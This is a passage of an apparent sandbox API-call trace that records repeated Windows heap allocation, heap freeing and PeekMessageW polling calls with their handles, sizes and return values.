(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0130.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0130.252] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.252] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.252] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0130.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0130.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.253] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.253] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0130.253] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0130.254] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd20 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd20 | out: hHeap=0x12c0000) returned 1 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0130.254] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0130.254] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0130.254] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.254] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0130.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0130.255] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0130.255] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0130.255] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.255] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0130.256] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0130.256] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0130.256] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.256] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0130.256] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.256] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0130.257] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0130.257] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0130.257] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.257] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0130.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0130.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0130.258] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.258] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.258] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0130.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.259] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0130.259] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe90 [0130.259] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe90 | out: hHeap=0x12c0000) returned 1 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0130.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0130.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0130.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0130.260] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.260] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0130.260] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0130.261] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0130.261] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.261] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0130.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0130.292] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.292] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0130.292] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.292] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0130.293] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0130.293] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0130.293] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0130.293] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0130.293] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.293] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df00 [0130.293] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0130.294] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0130.294] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0130.294] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0130.294] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0130.294] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.294] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0130.295] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0130.295] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efda0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0130.295] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.295] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0130.295] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0130.295] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b38 [0130.296] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b38 | out: hHeap=0x12c0000) returned 1 [0130.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0130.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efac0 | out: hHeap=0x12c0000) returned 1 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0130.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0130.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efac0 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0130.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0130.336] 